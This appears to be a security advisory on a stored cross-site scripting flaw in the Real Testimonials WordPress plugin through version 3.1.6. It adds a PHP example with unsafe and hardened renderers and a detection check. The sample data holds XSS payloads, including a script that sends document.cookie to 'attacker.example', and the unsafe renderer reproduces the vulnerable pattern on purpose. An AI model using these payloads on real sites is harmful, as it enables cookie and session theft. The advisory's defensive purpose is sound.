Impact
The Real Testimonials plugin for WordPress contains a stored cross‑site scripting flaw: script content saved in a testimonial entry is persisted unchanged. When a page displays that testimonial, the stored fields are written into the HTML without output encoding, so any injected JavaScript executes in the browser of every visitor who views the page. The usual consequences of stored XSS apply: theft of credentials or session cookies, defacement, and delivery of further malicious content. The root cause is missing output encoding at the point where testimonial fields are placed into the page, classified as CWE‑79 (Improper Neutralization of Input During Web Page Generation, "Cross‑site Scripting").
Affected Systems
The vulnerability exists in every release of the Real Testimonials plugin distributed by ShapedPlugin LLC up to and including version 3.1.6. Any WordPress site running a version in that range and displaying testimonial entries that can be created or edited by untrusted or lower‑privileged users is affected. The installed version can be read from the Plugins screen in wp‑admin or with the WP‑CLI command wp plugin list.
Risk and Exploitability
The CVSS v3.1 base score of 6.5 falls in the Medium severity band. The EPSS score is below 1 %, indicating a low estimated probability of exploitation in the wild at present, and the flaw is not listed in the CISA KEV catalog. The CVE data does not state which role is needed; the reasonable inference from the description is that an attacker who can create or edit testimonial entries can store a payload, and that the stored XSS then fires whenever the rendered testimonial is shown to other users. Exploitation therefore depends on having the ability to submit testimonial content, a privilege that is typically restricted to authenticated users but is neither confirmed nor ruled out by the CVE record. Because the payload runs in the browser of whoever views the rendered entry, a logged‑in administrator who views the affected page is the highest‑value target.
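The rendering pattern described in the Impact section, and the check a site owner would want before and after patching, as an added example. This is not code from the Real Testimonials plugin; it is a hypothetical testimonial renderer written in plain PHP, shown first in the unsafe form that reproduces the CWE‑79 pattern and then in a hardened form. The sample entries are constructed, the function names (render_testimonial_unsafe, render_testimonial_safe, esc, has_active_content) are invented for the illustration, and htmlspecialchars() stands in for WordPress's esc_html()/esc_attr() so the script runs with the php CLI outside WordPress.

```php
<?php
// Added example, not code from the Real Testimonials plugin. A hypothetical
// testimonial renderer in plain PHP, first in the unsafe form that reproduces
// the CWE-79 pattern described above, then hardened. htmlspecialchars() stands
// in for WordPress's esc_html()/esc_attr(); in a real plugin use those, or
// wp_kses_post() if the field is allowed to carry limited HTML.

// Constructed sample entries: one benign, one carrying stored XSS payloads
// in both the author and body fields.
$testimonials = [
    ['author' => 'Jane Doe',
     'body'   => 'Great service, would recommend!'],
    ['author' => '<img src=x onerror=alert(document.cookie)>',
     'body'   => 'Nice "work" <script>fetch("//attacker.example/?c="+document.cookie)</script>'],
];

// Unsafe: stored values are concatenated straight into markup, so any HTML
// saved in the entry is rendered and any script in it runs in the visitor's browser.
function render_testimonial_unsafe(array $t): string
{
    return '<blockquote class="testimonial"><p>' . $t['body'] . '</p>'
         . '<cite>' . $t['author'] . '</cite></blockquote>';
}

// Hardened: every untrusted value is encoded for an HTML text context at the
// point of output. ENT_QUOTES also encodes ' and ", so the same helper is safe
// inside a quoted attribute value; ENT_SUBSTITUTE keeps invalid UTF-8 from
// silently turning the whole string into "" (which would hide a problem).
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_testimonial_safe(array $t): string
{
    return '<blockquote class="testimonial"><p>' . esc($t['body']) . '</p>'
         . '<cite>' . esc($t['author']) . '</cite></blockquote>';
}

// Check: parse the rendered fragment the way a browser would and report
// whether it contains a <script> element or any on* event-handler attribute.
// This is what actually executes, so it is a better test than grepping for
// the literal payload text, which survives (inert) inside the escaped output.
function has_active_content(string $html): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<?xml encoding="UTF-8">' . $html,
                   LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (strtolower($el->tagName) === 'script') {
            return true;
        }
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                return true;
            }
        }
    }
    return false;
}

foreach ($testimonials as $i => $t) {
    $unsafe = render_testimonial_unsafe($t);
    $safe   = render_testimonial_safe($t);
    printf("entry %d: unsafe render carries live script? %s | safe render? %s\n",
           $i,
           has_active_content($unsafe) ? 'yes' : 'no',
           has_active_content($safe)   ? 'yes' : 'no');
    echo $safe, "\n";
}
```

Run it with php on the command line: entry 1 reports yes for the unsafe render and no for the hardened one, and the echoed hardened markup shows the payload reduced to inert text. The same DOM‑based check can be pointed at the HTML of a live testimonial page to confirm that an upgrade past 3.1.6, or a theme override, has actually removed the executing content rather than only hiding it.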